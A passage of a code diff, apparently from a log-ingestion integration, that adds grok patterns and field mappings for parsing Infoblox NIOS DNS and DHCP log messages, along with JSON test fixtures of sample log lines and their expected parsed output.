%{DATA:infoblox_nios_log_dns_header_flags} \\(%{IP:server_ip}\\)" + DNS_8: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{DATA:network_transport}: 
%{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags} %{GREEDYDATA:dns_records}" + DNS_9: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}" + DNS_10: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): transfer of '%{DATA:dns_question_name}/%{DATA:dns_question_class}': %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_11: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*CEF:0\\|Infoblox\\|NIOS\\|%{GREEDYDATA:infoblox_nios_log_dns_version}\\|RPZ-%{DATA:dns_answers_type}\\|%{DATA:infoblox_nios_log_dns_answers_policy}\\|\\d+\\|app=DNS dst=%{IP:server_ip} src=%{IP:client_ip} spt=%{NUMBER:client_port} view=%{DATA:infoblox_nios_log_dns_view_name} qtype=%{WORD:dns_question_type} msg=%{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_12: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags} %{GREEDYDATA:dns_records}" + DNS_13: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}" + DNS_14: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{GREEDYDATA:infoblox_nios_log_dns_message}" + + # Original pattern + DNS_0: '(%{WORD:infoblox_nios_log_dns_category}: )?client ?(%{DATA}) %{IP:client_ip}#%{INT:client_port} (%{DATA}): query: 
%{DATA:dns_question_name} %{WORD:dns_question_class} %{WORD:dns_question_type} %{QUERY_FLAGS} \(%{IP}\)' + + # Other patterns + + ## For DNS message like: + ## FORMERR resolving 'test.testing.io/AAAA/IN': 192.168.1.136#53 + DNS_FORMERR: "%{WORD:event_action} resolving '%{DATA:dns_question_name}/%{DATA:dns_question_type}/%{DATA:dns_question_class}': %{IP:destination_ip}#%{NUMBER:destination_port}" + + ## For other message like: + ## r-l-e:192.168.1.113,Fixed,P76984,c4:d0:e3:b4:08:4d,1732119022,1732291822,,$ + DNS_OTHER: "r-l-e:%{IP:client_ip},%{DATA:infoblox_nios_log_dns_category},%{DATA:infoblox_nios_log_dns_client_hostname},%{MAC:client_mac},%{NUMBER:infoblox_nios_log_dns_lease_start},%{NUMBER:infoblox_nios_log_dns_lease_end},%{GREEDYDATA:infoblox_nios_log_dns_message}" + + - name: parse_event + filter: "{{'REQUEST DHCP' in original.message or 'DHCPREQUEST' in original.message}}" + external: + name: grok.match + properties: + output_field: message + pattern: "%{DHCP_1}|%{DHCP_2}|%{DHCP_3}|%{DHCP_4}|%{DHCP_5}|%{DHCP_6}|%{DHCP_7}|%{DHCP_8}|%{DHCP_9}|%{DHCP_10}|%{DHCP_11}|%{DHCP_12}|%{DHCP_OTHER}" + custom_patterns: + DHCP_1: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} \(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_2: '%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} \(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_3: '%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} 
\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid}: %{GREEDYDATA:infoblox_nios_log_dhcp_request_message}' + DHCP_4: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} \(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}' + DHCP_5: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_6: '%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_7: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id}: %{GREEDYDATA:infoblox_nios_log_dhcp_request_message}' + DHCP_8: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id}: %{GREEDYDATA:infoblox_nios_log_dhcp_request_message}" + DHCP_9: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} via 
(%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{GREEDYDATA:infoblox_nios_log_dhcp_trans_id}' + DHCP_10: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCP_11: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{GREEDYDATA:infoblox_nios_log_dhcp_trans_id}" + DHCP_12: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name})" + + # Other patterns + + ## For DHCP message like: + ## Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0", a remote-id of "0a:44:70:46" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. 
(NEW) + DHCP_OTHER: 'Option %{NUMBER}: received a %{DATA:event_action} packet from %{NOTSPACE} %{DATA:infoblox_nios_log_dhcp_relay_interface_name} with a circuit-id of \"%{DATA:infoblox_nios_log_dhcp_circuit_id}\", a remote-id of \"%{DATA:infoblox_nios_log_dhcp_remote_id}\" for %{IP:client_ip} \(%{MAC:client_mac}\) %{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}' + + - name: parse_event + filter: "{{'DHCPACK' in original.message}}" + external: + name: grok.match + properties: + output_field: message + pattern: "%{DHCPACK_1}|%{DHCPACK_2}|%{DHCPACK_3}|%{DHCPACK_4}|%{DHCPACK_5}|%{DHCPACK_6}|%{DHCPACK_7}|%{DHCPACK_8}|%{DHCPACK_9}|%{DHCPACK_10}|%{DHCPACK_11}|%{DHCPACK_12}" + custom_patterns: + # Patterns are inspired by + # https://github.com/elastic/integrations/blob/main/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dhcp.yml + DHCPACK_1: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} offered-duration %{NUMBER:infoblox_nios_log_dhcp_offered_duration} \\(%{DATA:infoblox_nios_log_dhcp_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_2: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} offered-duration %{NUMBER:infoblox_nios_log_dhcp_offered_duration} \\(%{DATA:infoblox_nios_log_dhcp_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_3: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} 
\\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} \\(%{DATA:infoblox_nios_log_dhcp_lease_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_4: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} offered-duration %{NUMBER:infoblox_nios_log_dhcp_offered_duration} \\(%{DATA:infoblox_nios_log_dhcp_message}\\)" + DHCPACK_5: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} \\(%{DATA:infoblox_nios_log_dhcp_lease_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_6: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} \\(%{DATA:infoblox_nios_log_dhcp_lease_message}\\)" + DHCPACK_7: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay 
(%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} \\(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\\)" + DHCPACK_8: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_9: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{GREEDYDATA:infoblox_nios_log_dhcp_lease_duration}" + DHCPACK_10: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_11: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{GREEDYDATA:infoblox_nios_log_dhcp_lease_duration}" + DHCPACK_12: "%{WORD:event_action} to %{IP:client_ip} \\(%{MAC:client_mac}\\) via %{WORD:observer_ingress_interface_name}" + + - name: parse_datetime + external: + name: date.parse + properties: + input_field: 
"{{parse_event.message._tmp_timestamp}}" + output_field: result + format: "%d-%b-%Y %H:%M:%S.%f" + - name: set_ecs_fields stages: set_ecs_fields: actions: - set: - source.ip: "{{parse_event.message.src}}" - filter: "{{parse_event.message.src | is_ipaddress}}" + source.ip: "{{parse_event.message.client_ip}}" + filter: "{{parse_event.message.client_ip | is_ipaddress}}" - set: - source.port: "{{parse_event.message.spt}}" + "@timestamp": "{{parse_datetime.result}}" + event.action: "{{parse_event.message.event_action}}" + event.reason: "{{parse_event.message.infoblox_nios_log_dhcp_request_message or parse_event.message.infoblox_nios_log_dhcp_lease_message}}" + + source.port: "{{parse_event.message.client_port}}" + source.mac: "{{parse_event.message.client_mac}}" + + destination.ip: "{{parse_event.message.destination_ip}}" + destination.port: "{{parse_event.message.destination_port}}" + + observer.ingress.interface.name: "{{parse_event.message.observer_ingress_interface_name}}" + + infoblox.dhcp.interface_ip: "{{parse_event.message.infoblox_nios_log_dhcp_interface_ip}}" + infoblox.dhcp.trans_id: "{{parse_event.message.infoblox_nios_log_dhcp_trans_id}}" + infoblox.dhcp.router_ip: "{{parse_event.message.infoblox_nios_log_dhcp_router_ip}}" + infoblox.dhcp.lease_time: "{{parse_event.message.infoblox_nios_log_dhcp_lease_time}}" + infoblox.dhcp.circuit_id: "{{parse_event.message.infoblox_nios_log_dhcp_circuit_id}}" + dns.question.class: "{{parse_event.message.dns_question_class}}" dns.question.type: "{{parse_event.message.dns_question_type}}" dns.question.name: "{{parse_event.message.dns_question_name}}" - dns.type: "query" + dns.response_code: "{{parse_event.message.dns_response_code}}" + dns.header_flags: > [ {% if parse_event.message.flags_rd == "+" %}"RD",{% endif %} {% if parse_event.message.flags_cd == "C" %}"CD",{% endif %} ] + + - set: + dns.type: query + filter: '{{parse_event.message.get("response_code") == None}}' + - set: + dns.type: answer + dns.response_code: 
"{{parse_event.message.response_code}}" + filter: '{{parse_event.message.get("response_code") != None}}' + + - set: + dns.answers: | + [ + {%- for data in parse_event.message.dns_records.split(';') -%} + {%- if data != "" -%} + {%- set record = data.split(' ') -%} + {"name": "{{record[-5]}}", "ttl": {{record[-4]}}, "class": "{{record[-3]}}", "type": "{{record[-2]}}", "data": "{{record[-1]}}"}, + {%- endif -%} + {%- endfor -%} + ] + filter: "{{parse_event.message.get('dns_records') != None}}" + + - set: + network.transport: tcp + filter: '{{parse_event.message.get("flags_tcp") != None and parse_event.message.flags_tcp == "T"}}' + - set: + network.transport: udp + filter: '{{parse_event.message.get("flags_tcp") != None and parse_event.message.flags_tcp != "T"}}' - set: - network.transport: "tcp" - filter: '{{parse_event.message.flags_tcp == "T"}}' + network.transport: "{{parse_event.message.network_transport | lower }}" + filter: '{{parse_event.message.get("network_transport") != None}}' - set: - infoblox.ddi.category: "{{parse_event.message.category}}" + infoblox.ddi.category: "{{parse_event.message.infoblox_nios_log_dns_category}}" diff --git a/Infoblox/ddi/tests/query_log_dhcp_1.json b/Infoblox/ddi/tests/query_log_dhcp_1.json new file mode 100644 index 000000000..0e2ff27e2 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_1.json 
@@ -0,0 +1,31 @@
+{
+ "input": {
+ "message": "Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)"
+ },
+ "expected": {
+ "message": "Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)",
+ "event": {
+ "action": "REQUEST DHCP",
+ "reason": "lease time is undefined seconds. (NEW)"
+ },
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "infoblox": {
+ "dhcp": {
+ "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0"
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.222"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.222",
+ "ip": "192.168.1.222",
+ "mac": "00:50:56:ae:b3:44"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dhcp_2.json b/Infoblox/ddi/tests/query_log_dhcp_2.json
new file mode 100644
index 000000000..44aebdb62
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dhcp_2.json
@@ -0,0 +1,31 @@
+{
+ "input": {
+ "message": "Option 82: received a REQUEST DHCP packet from relay-agent 192.168.1.53 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.53 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)"
+ },
+ "expected": {
+ "message": "Option 82: received a REQUEST DHCP packet from relay-agent 192.168.1.53 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.53 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)",
+ "event": {
+ "action": "REQUEST DHCP",
+ "reason": "lease time is undefined seconds. (NEW)"
+ },
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "infoblox": {
+ "dhcp": {
+ "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0"
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.53"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.53",
+ "ip": "192.168.1.53",
+ "mac": "00:50:56:ae:b3:44"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dhcp_3.json b/Infoblox/ddi/tests/query_log_dhcp_3.json
new file mode 100644
index 000000000..bca901b0b
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dhcp_3.json
@@ -0,0 +1,31 @@
+{
+ "input": {
+ "message": "DHCPREQUEST for 192.168.1.107 from e8:c8:29:5c:c8:99 via 192.168.1.107 TransID 80b994d6"
+ },
+ "expected": {
+ "message": "DHCPREQUEST for 192.168.1.107 from e8:c8:29:5c:c8:99 via 192.168.1.107 TransID 80b994d6",
+ "event": {
+ "action": "DHCPREQUEST"
+ },
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "infoblox": {
+ "dhcp": {
+ "interface_ip": "192.168.1.107",
+ "trans_id": "80b994d6"
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.107"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.107",
+ "ip": "192.168.1.107",
+ "mac": "e8:c8:29:5c:c8:99"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dhcp_4.json b/Infoblox/ddi/tests/query_log_dhcp_4.json
new file mode 100644
index 000000000..826be7f66
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dhcp_4.json
@@ -0,0 +1,38 @@
+{
+ "input": {
+ "message": "DHCPREQUEST for 192.168.1.208 from 00:50:56:ae:17:c6 (VDPSCE080019) via eth2 TransID 823c1fa3 uid 01:00:50:56:ae:17:c6 (RENEW)"
+ },
+ "expected": {
+ "message": "DHCPREQUEST for 192.168.1.208 from 00:50:56:ae:17:c6 (VDPSCE080019) via eth2 TransID 823c1fa3 uid 01:00:50:56:ae:17:c6 (RENEW)",
+ "event": {
+ "action": "DHCPREQUEST",
+ "reason": "RENEW"
+ },
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "infoblox": {
+ "dhcp": {
+ "trans_id": "823c1fa3"
+ }
+ },
+ "observer": {
+ "ingress": {
+ "interface": {
+ "name": "eth2"
+ }
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.208"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.208",
+ "ip": "192.168.1.208",
+ "mac": "00:50:56:ae:17:c6"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dhcp_5.json b/Infoblox/ddi/tests/query_log_dhcp_5.json
new file mode 100644
index 000000000..681472682
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dhcp_5.json
@@ -0,0 +1,33 @@
+{
+ "input": {
+ "message": "DHCPREQUEST for 192.168.1.95 (192.168.1.95) from d8:94:03:ec:da:d1 via 192.168.1.95 TransID ac1b72c4: lease 192.168.1.95 unavailable."
+ },
+ "expected": {
+ "message": "DHCPREQUEST for 192.168.1.95 (192.168.1.95) from d8:94:03:ec:da:d1 via 192.168.1.95 TransID ac1b72c4: lease 192.168.1.95 unavailable.",
+ "event": {
+ "action": "DHCPREQUEST",
+ "reason": "lease 192.168.1.95 unavailable."
+ },
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "infoblox": {
+ "dhcp": {
+ "interface_ip": "192.168.1.95",
+ "router_ip": "192.168.1.95",
+ "trans_id": "ac1b72c4"
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.95"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.95",
+ "ip": "192.168.1.95",
+ "mac": "d8:94:03:ec:da:d1"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dhcp_6.json b/Infoblox/ddi/tests/query_log_dhcp_6.json
new file mode 100644
index 000000000..ad6128a51
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dhcp_6.json
@@ -0,0 +1,32 @@
+{
+ "input": {
+ "message": "DHCPREQUEST for 192.168.1.159 from c8:09:a8:f8:cd:e8 via 192.168.1.159 TransID e711c0c1: ignored (unknown subnet)."
+ },
+ "expected": {
+ "message": "DHCPREQUEST for 192.168.1.159 from c8:09:a8:f8:cd:e8 via 192.168.1.159 TransID e711c0c1: ignored (unknown subnet).",
+ "event": {
+ "action": "DHCPREQUEST",
+ "reason": "ignored (unknown subnet)."
+ },
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "infoblox": {
+ "dhcp": {
+ "interface_ip": "192.168.1.159",
+ "trans_id": "e711c0c1"
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.159"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.159",
+ "ip": "192.168.1.159",
+ "mac": "c8:09:a8:f8:cd:e8"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dhcp_7.json b/Infoblox/ddi/tests/query_log_dhcp_7.json
new file mode 100644
index 000000000..301ee3a35
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dhcp_7.json
@@ -0,0 +1,32 @@
+{
+ "input": {
+ "message": "DHCPACK on 192.168.1.138 to 08:71:90:8d:0b:5d (P70955) via eth2 relay 192.168.1.138 lease-duration 172800"
+ },
+ "expected": {
+ "message": "DHCPACK on 192.168.1.138 to 08:71:90:8d:0b:5d (P70955) via eth2 relay 192.168.1.138 lease-duration 172800",
+ "event": {
+ "action": "DHCPACK"
+ },
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "observer": {
+ "ingress": {
+ "interface": {
+ "name": "eth2"
+ }
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.138"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.138",
+ "ip": "192.168.1.138",
+ "mac": "08:71:90:8d:0b:5d"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dhcp_8.json b/Infoblox/ddi/tests/query_log_dhcp_8.json
new file mode 100644
index 000000000..a0415a271
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dhcp_8.json
@@ -0,0 +1,27 @@
+{
+ "input": {
+ "message": "r-l-e:192.168.1.113,Fixed,P76984,c4:d0:e3:b4:08:4d,1732119022,1732291822,,$"
+ },
+ "expected": {
+ "message": "r-l-e:192.168.1.113,Fixed,P76984,c4:d0:e3:b4:08:4d,1732119022,1732291822,,$",
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "infoblox": {
+ "ddi": {
+ "category": "Fixed"
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.113"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.113",
+ "ip": "192.168.1.113",
+ "mac": "c4:d0:e3:b4:08:4d"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dns_1.json b/Infoblox/ddi/tests/query_log_dns_1.json
new file mode 100644
index 000000000..042f12e70
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dns_1.json
@@ -0,0 +1,36 @@ +{ + "input": { + "message": "FORMERR resolving 'test.testing.io/AAAA/IN': 192.168.1.136#53" + }, + "expected": { + "message": "FORMERR resolving 'test.testing.io/AAAA/IN': 192.168.1.136#53", + "event": { + "action": "FORMERR" + }, + "destination": { + "address": "192.168.1.136", + "ip": "192.168.1.136", + "port": 53 + }, + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.testing.io", + "registered_domain": "testing.io", + "subdomain": "test", + "top_level_domain": "io", + "type": "AAAA" + }, + "type": "query" + }, + "related": { + "hosts": [ + "test.testing.io" + ], + "ip": [ + "192.168.1.136" + ] + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_2.json b/Infoblox/ddi/tests/query_log_dns_2.json new file mode 100644 index 000000000..1d4135768 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_2.json @@ -0,0 +1,36 @@ +{ + "input": { + "message": "client 192.168.1.1#1130: UDP: query: test.io IN A response: NXDOMAIN +" + }, + "expected": { + "message": "client 192.168.1.1#1130: UDP: query: test.io IN A response: NXDOMAIN +", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.io", + "registered_domain": "test.io", + "top_level_domain": "io", + "type": "A" + }, + "response_code": "NXDOMAIN", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "test.io" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 1130 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_3.json b/Infoblox/ddi/tests/query_log_dns_3.json new file mode 100644 index 000000000..959a20d36 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_3.json 
